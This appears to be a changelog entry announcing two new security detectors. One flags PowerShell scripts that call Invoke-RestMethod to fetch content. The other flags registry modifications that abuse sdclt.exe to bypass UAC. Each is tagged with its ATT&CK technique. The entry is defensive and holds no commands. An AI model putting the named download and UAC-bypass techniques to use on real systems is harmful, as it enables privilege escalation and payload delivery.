CREATED: WIN-POWERSHELL-INVOKE-RESTMETHOD (#1452)
This detector identifies the execution of PowerShell scripts that include the
Invoke-RestMethod cmdlet. The Invoke-RestMethod cmdlet was designed to send HTTP and HTTPS requests to Representational State Transfer (REST) web services that returns richly structured data, but can be used to download any type of content.
ATT&CK Technique T1086
CREATED: WIN-SDCLT-UAC-BYPASS-REGMOD (#1490)
This detector identifies Windows Registry modifications that enable the use of Windows Backup Client (
sdclt.exe) as a UAC bypass/privilege exploit technique.
ATT&CK Technique T1088